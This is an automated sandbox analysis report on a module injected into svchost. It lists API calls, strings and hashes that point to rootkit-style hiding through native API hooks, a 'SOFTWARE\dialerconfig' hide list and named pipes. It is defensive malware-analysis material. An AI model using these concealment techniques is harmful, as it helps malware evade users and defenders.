Part of subcall function 0000029B92341A14: K32GetModuleFileNameExW.KERNEL32 ref: 0000029B92341A58
Part of subcall function 0000029B92341A14: PathFindFileNameW.SHLWAPI ref: 0000029B92341A67
Part of subcall function 0000029B92341A14: lstrlenW.KERNEL32 ref: 0000029B92341A73
Part of subcall function 0000029B92341A14: StrCpyW.SHLWAPI ref: 0000029B92341A86
Part of subcall function 0000029B92341A14: CloseHandle.KERNEL32 ref: 0000029B92341A94

GetProcAddress.KERNEL32 ref: 0000029B92342D95

Part of subcall function 0000029B92341554: StrCmpIW.SHLWAPI ref: 0000029B92341585

Part of subcall function 0000029B92343930: StrCmpNIW.SHLWAPI ref: 0000029B92343948

StrCmpNIW.SHLWAPI ref: 0000029B92342DD8
lstrlenW.KERNEL32 ref: 0000029B92342F00

Strings

\Device\Nsi, xrefs: 0000029B92342DCB
NtQueryObject, xrefs: 0000029B92342D8B
ntdll.dll, xrefs: 0000029B92342D79

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
String ID: NtQueryObject$\Device\Nsi$ntdll.dll
API String ID: 2119608203-3850299575
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: 4a0afcd44b21c76f16c6e43cac0ed3154a0ad7e623a1261c59f00051067489f4
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 35B1D222E38A5089FF568F26E6487A963A4FB44BA4F545196EF0E63794DF35CC80CB40

Function 0000029B923A7E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000029B923A7E8C
RtlCaptureContext.NTDLL ref: 0000029B923A7EB9
RtlLookupFunctionEntry.NTDLL ref: 0000029B923A7ED3
RtlVirtualUnwind.NTDLL ref: 0000029B923A7F14
IsDebuggerPresent.KERNEL32 ref: 0000029B923A7F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000029B923A7F89
UnhandledExceptionFilter.KERNEL32 ref: 0000029B923A7F94

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 1d94c29b4dc0df67a99fe5fee212b0d089e900caa69dc19dff07c4a222663956
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 1E315E76A29B808AFB618F60F8847EE7360F784754F44442ADB4D47B98EF38C648CB10

Function 0000029B92347E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 0000029B92347E8C
RtlCaptureContext.NTDLL ref: 0000029B92347EB9
RtlLookupFunctionEntry.NTDLL ref: 0000029B92347ED3
RtlVirtualUnwind.NTDLL ref: 0000029B92347F14
IsDebuggerPresent.KERNEL32 ref: 0000029B92347F68
SetUnhandledExceptionFilter.KERNEL32 ref: 0000029B92347F89
UnhandledExceptionFilter.KERNEL32 ref: 0000029B92347F94

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: 3b4b057829b57ca63e4fc0b209ca7750037d932c767e0b41cc277afcc155a676
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 0B318E72A29B808AFB619F60F8447EE7361F784754F44452ADB4E47B98EF38C648CB10

Function 0000029B923AB50C Relevance: 9.1, APIs: 6, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 0000029B923AB585
RtlLookupFunctionEntry.NTDLL ref: 0000029B923AB59D
RtlVirtualUnwind.NTDLL ref: 0000029B923AB5D8
IsDebuggerPresent.KERNEL32 ref: 0000029B923AB611
SetUnhandledExceptionFilter.KERNEL32 ref: 0000029B923AB61B
UnhandledExceptionFilter.KERNEL32 ref: 0000029B923AB626

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 092feae468fda326dae7e027b6ddc3c24d84675113ff869bdf37d8ca371a037f
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: A9315C36A28F808AFB61CF25E9443AE73A4F798764F510126EB9D47BA4DF38C5458B00

Function 0000029B923AFEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000029B923AFF67
WriteFile.KERNEL32 ref: 0000029B923B021E
WriteFile.KERNEL32 ref: 0000029B923B0270
GetLastError.KERNEL32 ref: 0000029B923B0372
GetLastError.KERNEL32 ref: 0000029B923B03D2

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: beb2bd4788e2da15fd7c812ee1c2a6f3390965935010381497ca5efa73eaf47c
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 9DE1CE36E29A80AEF702CF75E2882AD7BB1F3457A8F144116DF4A57B99DB34C516CB00

Function 0000029B9234FEF8 Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 0000029B9234FF67
WriteFile.KERNEL32 ref: 0000029B9235021E
WriteFile.KERNEL32 ref: 0000029B92350270
GetLastError.KERNEL32 ref: 0000029B92350372
GetLastError.KERNEL32 ref: 0000029B923503D2

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID:
API String ID: 1443284424-0
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 603ef9abfe46e083a65ece6363720705daa0552c9aa1682878091de31fa4e3f9
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 62E1DF22F29A809EF702CB64E28869D7BB1F34A7A8F144116DF4E57B99DB35C516CB00

Function 0000029B923A1650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000029B923A165B
HeapAlloc.KERNEL32 ref: 0000029B923A166A

Part of subcall function 0000029B923A1274: GetProcessHeap.KERNEL32 ref: 0000029B923A127A
Part of subcall function 0000029B923A1274: HeapAlloc.KERNEL32 ref: 0000029B923A1289
Part of subcall function 0000029B923A1274: GetProcessHeap.KERNEL32 ref: 0000029B923A12A3
Part of subcall function 0000029B923A1274: HeapAlloc.KERNEL32 ref: 0000029B923A12B4

RegOpenKeyExW.ADVAPI32 ref: 0000029B923A16DA
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A1707
RegCloseKey.ADVAPI32 ref: 0000029B923A1721
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A1741
RegCloseKey.ADVAPI32 ref: 0000029B923A175C
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A177C
RegCloseKey.ADVAPI32 ref: 0000029B923A1797
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A17B7
RegCloseKey.ADVAPI32 ref: 0000029B923A17D2
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A17F2
RegCloseKey.ADVAPI32 ref: 0000029B923A180D
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A182D
RegCloseKey.ADVAPI32 ref: 0000029B923A1848
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A1868
RegCloseKey.ADVAPI32 ref: 0000029B923A1883
RegOpenKeyExW.ADVAPI32 ref: 0000029B923A18A3
RegCloseKey.ADVAPI32 ref: 0000029B923A18BE
RegCloseKey.ADVAPI32 ref: 0000029B923A18C8

Part of subcall function 0000029B923A12C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000029B923A1326
Part of subcall function 0000029B923A12C8: GetProcessHeap.KERNEL32 ref: 0000029B923A1334
Part of subcall function 0000029B923A12C8: HeapAlloc.KERNEL32 ref: 0000029B923A1345
Part of subcall function 0000029B923A12C8: RegEnumValueW.ADVAPI32 ref: 0000029B923A13A1
Part of subcall function 0000029B923A12C8: GetProcessHeap.KERNEL32 ref: 0000029B923A13E9
Part of subcall function 0000029B923A12C8: HeapAlloc.KERNEL32 ref: 0000029B923A13F7
Part of subcall function 0000029B923A12C8: GetProcessHeap.KERNEL32 ref: 0000029B923A141B
Part of subcall function 0000029B923A12C8: HeapFree.KERNEL32 ref: 0000029B923A1429
Part of subcall function 0000029B923A12C8: lstrlenW.KERNEL32 ref: 0000029B923A1432
Part of subcall function 0000029B923A12C8: GetProcessHeap.KERNEL32 ref: 0000029B923A1440
Part of subcall function 0000029B923A12C8: HeapAlloc.KERNEL32 ref: 0000029B923A144E

Strings

tcp_local, xrefs: 0000029B923A1826
udp, xrefs: 0000029B923A189C
pid, xrefs: 0000029B923A173A
process_names, xrefs: 0000029B923A1775
startup, xrefs: 0000029B923A16FD
tcp_remote, xrefs: 0000029B923A1861
service_names, xrefs: 0000029B923A17EB
SOFTWARE\dialerconfig, xrefs: 0000029B923A16BA
paths, xrefs: 0000029B923A17B0

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: e5beb116b88e31b6b3af751823b61ee1a7f3008600d35a442f504c12ce16f1ac
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 96710B3AF24A5489FB119F75F9586A937B4FB84BA8F011122DB8E57A28DF38C445CB40

Function 0000029B92341650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000029B9234165B
HeapAlloc.KERNEL32 ref: 0000029B9234166A

Part of subcall function 0000029B92341274: GetProcessHeap.KERNEL32 ref: 0000029B9234127A
Part of subcall function 0000029B92341274: HeapAlloc.KERNEL32 ref: 0000029B92341289
Part of subcall function 0000029B92341274: GetProcessHeap.KERNEL32 ref: 0000029B923412A3
Part of subcall function 0000029B92341274: HeapAlloc.KERNEL32 ref: 0000029B923412B4

RegOpenKeyExW.ADVAPI32 ref: 0000029B923416DA
RegOpenKeyExW.ADVAPI32 ref: 0000029B92341707
RegCloseKey.ADVAPI32 ref: 0000029B92341721
RegOpenKeyExW.ADVAPI32 ref: 0000029B92341741
RegCloseKey.ADVAPI32 ref: 0000029B9234175C
RegOpenKeyExW.ADVAPI32 ref: 0000029B9234177C
RegCloseKey.ADVAPI32 ref: 0000029B92341797
RegOpenKeyExW.ADVAPI32 ref: 0000029B923417B7
RegCloseKey.ADVAPI32 ref: 0000029B923417D2
RegOpenKeyExW.ADVAPI32 ref: 0000029B923417F2
RegCloseKey.ADVAPI32 ref: 0000029B9234180D
RegOpenKeyExW.ADVAPI32 ref: 0000029B9234182D
RegCloseKey.ADVAPI32 ref: 0000029B92341848
RegOpenKeyExW.ADVAPI32 ref: 0000029B92341868
RegCloseKey.ADVAPI32 ref: 0000029B92341883
RegOpenKeyExW.ADVAPI32 ref: 0000029B923418A3
RegCloseKey.ADVAPI32 ref: 0000029B923418BE
RegCloseKey.ADVAPI32 ref: 0000029B923418C8

Part of subcall function 0000029B923412C8: RegQueryInfoKeyW.ADVAPI32 ref: 0000029B92341326
Part of subcall function 0000029B923412C8: GetProcessHeap.KERNEL32 ref: 0000029B92341334
Part of subcall function 0000029B923412C8: HeapAlloc.KERNEL32 ref: 0000029B92341345
Part of subcall function 0000029B923412C8: RegEnumValueW.ADVAPI32 ref: 0000029B923413A1
Part of subcall function 0000029B923412C8: GetProcessHeap.KERNEL32 ref: 0000029B923413E9
Part of subcall function 0000029B923412C8: HeapAlloc.KERNEL32 ref: 0000029B923413F7
Part of subcall function 0000029B923412C8: GetProcessHeap.KERNEL32 ref: 0000029B9234141B
Part of subcall function 0000029B923412C8: HeapFree.KERNEL32 ref: 0000029B92341429
Part of subcall function 0000029B923412C8: lstrlenW.KERNEL32 ref: 0000029B92341432
Part of subcall function 0000029B923412C8: GetProcessHeap.KERNEL32 ref: 0000029B92341440
Part of subcall function 0000029B923412C8: HeapAlloc.KERNEL32 ref: 0000029B9234144E

Strings

udp, xrefs: 0000029B9234189C
service_names, xrefs: 0000029B923417EB
process_names, xrefs: 0000029B92341775
SOFTWARE\dialerconfig, xrefs: 0000029B923416BA
pid, xrefs: 0000029B9234173A
startup, xrefs: 0000029B923416FD
tcp_remote, xrefs: 0000029B92341861
paths, xrefs: 0000029B923417B0
tcp_local, xrefs: 0000029B92341826

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction ID: e8bf89fdfaded7759334b5be4fb4eefde9002034faccd2838ee5f45d1fa9a0f2
Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
Instruction Fuzzy Hash: 43710B26F28F5089FB129F65F958A9927B4FB84BA8F405111DF8E57B28EF38C445CB40

Function 0000029B923A12C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000029B923A1326
GetProcessHeap.KERNEL32 ref: 0000029B923A1334
HeapAlloc.KERNEL32 ref: 0000029B923A1345
RegEnumValueW.ADVAPI32 ref: 0000029B923A13A1

Part of subcall function 0000029B923A1554: StrCmpIW.SHLWAPI ref: 0000029B923A1585

GetProcessHeap.KERNEL32 ref: 0000029B923A13E9
HeapAlloc.KERNEL32 ref: 0000029B923A13F7
GetProcessHeap.KERNEL32 ref: 0000029B923A141B
HeapFree.KERNEL32 ref: 0000029B923A1429
lstrlenW.KERNEL32 ref: 0000029B923A1432
GetProcessHeap.KERNEL32 ref: 0000029B923A1440
HeapAlloc.KERNEL32 ref: 0000029B923A144E
StrCpyW.SHLWAPI ref: 0000029B923A1470
GetProcessHeap.KERNEL32 ref: 0000029B923A1485
HeapFree.KERNEL32 ref: 0000029B923A1493

Strings

d, xrefs: 0000029B923A1365

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: ec7fa8a03897a198e65e11520e38f9644e0c523717f83329baa8039eef50814d
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: EE518076E28B549BFB15DF66F6483AA73A5F788B90F044125DB8907B14DF38D056CB00

Function 0000029B923412C8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000029B92341326
GetProcessHeap.KERNEL32 ref: 0000029B92341334
HeapAlloc.KERNEL32 ref: 0000029B92341345
RegEnumValueW.ADVAPI32 ref: 0000029B923413A1

Part of subcall function 0000029B92341554: StrCmpIW.SHLWAPI ref: 0000029B92341585

GetProcessHeap.KERNEL32 ref: 0000029B923413E9
HeapAlloc.KERNEL32 ref: 0000029B923413F7
GetProcessHeap.KERNEL32 ref: 0000029B9234141B
HeapFree.KERNEL32 ref: 0000029B92341429
lstrlenW.KERNEL32 ref: 0000029B92341432
GetProcessHeap.KERNEL32 ref: 0000029B92341440
HeapAlloc.KERNEL32 ref: 0000029B9234144E
StrCpyW.SHLWAPI ref: 0000029B92341470
GetProcessHeap.KERNEL32 ref: 0000029B92341485
HeapFree.KERNEL32 ref: 0000029B92341493

Strings

d, xrefs: 0000029B92341365

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction ID: bdb8cd8fd32e58f5c9a30b196687bf1509b21466849ff519062b8239c013ecfd
Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
Instruction Fuzzy Hash: C1515E72A28B449BFB16DF62F64879AB3A1F788B90F448124DB8D07B14DF38C156CB40

Function 0000029B923A1EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000029B923A1EBF

Part of subcall function 0000029B923A2174: GetModuleHandleA.KERNEL32 ref: 0000029B923A218C
Part of subcall function 0000029B923A2174: GetProcAddress.KERNEL32 ref: 0000029B923A219D

Part of subcall function 0000029B923A5C10: GetCurrentThreadId.KERNEL32 ref: 0000029B923A5C4B

Strings

NtEnumerateKey, xrefs: 0000029B923A1F59
NtResumeThread, xrefs: 0000029B923A1F02
sechost.dll, xrefs: 0000029B923A1FD9
EnumServiceGroupW, xrefs: 0000029B923A1F90
NtDeviceIoControlFile, xrefs: 0000029B923A1FF6
EnumServicesStatusExW, xrefs: 0000029B923A1FB1, 0000029B923A1FD2
NtQueryDirectoryFileEx, xrefs: 0000029B923A1F3C
advapi32.dll, xrefs: 0000029B923A1F97, 0000029B923A1FB8
ntdll.dll, xrefs: 0000029B923A1ECD
NtQueryDirectoryFile, xrefs: 0000029B923A1F1F
NtEnumerateValueKey, xrefs: 0000029B923A1F76
NtQuerySystemInformation, xrefs: 0000029B923A1EE5

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: 69be0b974d20119d684355802709a2a479446954a97314209a85b62e781b3225
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: 4531D568E39D0AA8FB47DF7AFB496E43320B745364FC24423DB09121659F38864ACF90

Function 0000029B92341EB4 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000029B92341EBF

Part of subcall function 0000029B92342174: GetModuleHandleA.KERNEL32 ref: 0000029B9234218C
Part of subcall function 0000029B92342174: GetProcAddress.KERNEL32 ref: 0000029B9234219D

Part of subcall function 0000029B92345C10: GetCurrentThreadId.KERNEL32 ref: 0000029B92345C4B

Strings

NtResumeThread, xrefs: 0000029B92341F02
NtEnumerateValueKey, xrefs: 0000029B92341F76
NtEnumerateKey, xrefs: 0000029B92341F59
NtQueryDirectoryFileEx, xrefs: 0000029B92341F3C
NtQuerySystemInformation, xrefs: 0000029B92341EE5
EnumServicesStatusExW, xrefs: 0000029B92341FB1, 0000029B92341FD2
advapi32.dll, xrefs: 0000029B92341F97, 0000029B92341FB8
EnumServiceGroupW, xrefs: 0000029B92341F90
sechost.dll, xrefs: 0000029B92341FD9
NtQueryDirectoryFile, xrefs: 0000029B92341F1F
ntdll.dll, xrefs: 0000029B92341ECD
NtDeviceIoControlFile, xrefs: 0000029B92341FF6

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: CurrentThread$AddressHandleModuleProc
String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
API String ID: 4175298099-1975688563
Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction ID: d00ac7caf2c78e3e1b6f4d2fb9c1e88055c9346dc5458434f8cf04de3b049631
Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
Instruction Fuzzy Hash: AB319360D3894AA8FF07EF66FB59AD42331AB84364FC14493E71D221659F38C64ADB80

Function 0000029B923A23F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON

Download Yara Rule

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000029B923A2405
GetCurrentProcessId.KERNEL32 ref: 0000029B923A240F

Part of subcall function 0000029B923A19AC: OpenProcess.KERNEL32 ref: 0000029B923A19CA
Part of subcall function 0000029B923A19AC: IsWow64Process.KERNEL32 ref: 0000029B923A19E0
Part of subcall function 0000029B923A19AC: CloseHandle.KERNEL32 ref: 0000029B923A19FB

CreateFileW.KERNEL32 ref: 0000029B923A2468
WriteFile.KERNEL32 ref: 0000029B923A2490
ReadFile.KERNEL32 ref: 0000029B923A24AF
CloseHandle.KERNEL32 ref: 0000029B923A24B8

Strings

\\.\pipe\dialerchildproc32, xrefs: 0000029B923A243F
\\.\pipe\dialerchildproc64, xrefs: 0000029B923A2438

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: fa10133c3d7138c3e1ea23b83ec8bd54cea43b4f486ff9435b2063b7ba863de6
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 5E211D3AE2CA5096F7119F25F64836A77A0F789BA4F504215EB5A02BA8DF3CC149CF00

Function 0000029B923423F0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52
filethreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessIdOfThread.KERNEL32 ref: 0000029B92342405
GetCurrentProcessId.KERNEL32 ref: 0000029B9234240F

Part of subcall function 0000029B923419AC: OpenProcess.KERNEL32 ref: 0000029B923419CA
Part of subcall function 0000029B923419AC: IsWow64Process.KERNEL32 ref: 0000029B923419E0
Part of subcall function 0000029B923419AC: CloseHandle.KERNEL32 ref: 0000029B923419FB

CreateFileW.KERNEL32 ref: 0000029B92342468
WriteFile.KERNEL32 ref: 0000029B92342490
ReadFile.KERNEL32 ref: 0000029B923424AF
CloseHandle.KERNEL32 ref: 0000029B923424B8

Strings

\\.\pipe\dialerchildproc64, xrefs: 0000029B92342438
\\.\pipe\dialerchildproc32, xrefs: 0000029B9234243F

Memory Dump Source

Source File: 0000000F.00000002.2637446235.0000029B92340000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B92340000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b92340000_svchost.jbxd

Similarity

API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
API String ID: 2171963597-1373409510
Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction ID: 9945212eb12b37fb5cdb8075cf828276fabe8e0846eaf5704bde08a6b45d0c46
Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
Instruction Fuzzy Hash: 1D211D36E28B4086FB119B25F64875A67A0F789BA4F504215EB5E07BA8DF3CC149CF00

Function 0000029B923A104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000029B923A10AB
RegEnumValueW.ADVAPI32 ref: 0000029B923A110E
GetProcessHeap.KERNEL32 ref: 0000029B923A1155
HeapAlloc.KERNEL32 ref: 0000029B923A1163
GetProcessHeap.KERNEL32 ref: 0000029B923A1187
HeapFree.KERNEL32 ref: 0000029B923A1195

Strings

d, xrefs: 0000029B923A10CE

Memory Dump Source

Source File: 0000000F.00000002.2640215810.0000029B923A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000029B923A0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_29b923a0000_svchost.jbxd

Similarity

API ID: Heap$Process$AllocEnumFreeInfoQueryValue
String ID: d
API String ID: 3743429067-2564639436
Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction ID: a3d15db5dad924713430c0d6351fe8cea023a432554b11e71500a39aabec8c71
Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
Instruction Fuzzy Hash: 38417177A28B909BF7618F61F5487AAB7A5F388B94F008125DBC907B54DF38D165CB00

Function 0000029B9234104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97memoryregistryCOMMON

Download Yara Rule

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000029B923410AB
RegEnumValueW.ADVAPI32 ref: 0000029B9234110E
